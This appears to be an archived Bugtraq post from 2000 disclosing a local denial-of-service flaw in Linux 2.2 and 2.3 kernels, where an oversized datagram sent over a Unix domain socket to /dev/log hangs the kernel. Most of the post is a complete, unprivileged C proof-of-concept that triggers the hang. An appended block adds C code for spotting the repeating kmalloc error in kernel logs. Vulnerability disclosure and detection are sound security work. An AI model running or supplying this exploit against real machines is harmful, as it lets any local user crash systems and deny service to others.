Bugtraq mailing list archives
Local Denial-of-Service attack against Linux
From: fenlason () CLEARWAY COM (Jay Fenlason)
Date: Thu, 23 Mar 2000 17:55:09 -0500
This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1), 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel) on my 6x86 scratch machine and our various Pentium development machines. Note that this does not require any special privileges.

The send system call immediately puts the kernel in a loop spewing

    kmalloc: Size (131076) too large

forever (or until you hit the reset button).

Apparently unix domain sockets are ignoring the /proc/sys/net/core/wmem_max parameter, despite the documentation to the contrary.

The fix should be simple, but I haven't had time to chase it down, and I'm not (usually) a Linux kernel developer.

-- JF

--- BEGIN INCLUDED SOURCE FILE ---
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;
    int i;

    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' '+(i%95);
    buf[i] = '\0';

    SyslogAddr.sa_family = AF_UNIX;
    strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
    LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
    sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
    return 0;
}
--- END INCLUDED SOURCE FILE ---
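For detection, the symptom described above (the same kmalloc message repeating without pause) can be picked out of captured console or kernel log text. The following is an added example, not part of the original post: the function names, the sample lines, the wmem_max value of 65535 and the threshold of 3 are all assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Extract N from "kmalloc: Size (N) too large". Returns 1 on a full match. */
static int parse_kmalloc_size(const char *line, unsigned long *size)
{
    const char *p = strstr(line, "kmalloc: Size (");
    int end = 0;

    if (p == NULL)
        return 0;
    if (sscanf(p, "kmalloc: Size (%lu) too large%n", size, &end) != 1)
        return 0;
    return end != 0; /* %n is stored only when the whole pattern matched */
}

/* Longest run of consecutive lines reporting a refused allocation > limit. */
static size_t longest_oversize_run(const char *const *lines, size_t n,
                                   unsigned long limit)
{
    size_t run = 0, best = 0;

    for (size_t i = 0; i < n; i++) {
        unsigned long size = 0;
        if (parse_kmalloc_size(lines[i], &size) && size > limit) {
            if (++run > best)
                best = run;
        } else {
            run = 0;
        }
    }
    return best;
}

/* Constructed sample: only the kmalloc message text comes from the post. */
static const char *const sample_log[] = {
    "Mar 23 17:55:01 host kernel: kmalloc: Size (131076) too large",
    "Mar 23 17:55:02 host kernel: unrelated constructed line",
    "Mar 23 17:55:09 host kernel: kmalloc: Size (131076) too large",
    "Mar 23 17:55:09 host kernel: kmalloc: Size (131076) too large",
    "Mar 23 17:55:09 host kernel: kmalloc: Size (131076) too large",
    "Mar 23 17:55:09 host kernel: kmalloc: Size (131076) too large",
};
#define SAMPLE_LINES (sizeof(sample_log) / sizeof(sample_log[0]))

int main(void)
{
    unsigned long wmem_max = 65535; /* assumed; read /proc/sys/net/core/wmem_max */
    size_t run = longest_oversize_run(sample_log, SAMPLE_LINES, wmem_max);

    printf("longest run above %lu bytes: %zu\n", wmem_max, run);
    return run >= 3; /* assumed alert threshold: 3 identical lines in a row */
}
```

Comparing the reported size against the configured wmem_max separates this condition from an isolated allocation failure: a long run of refused allocations larger than the limit means the limit is not being applied on that send path.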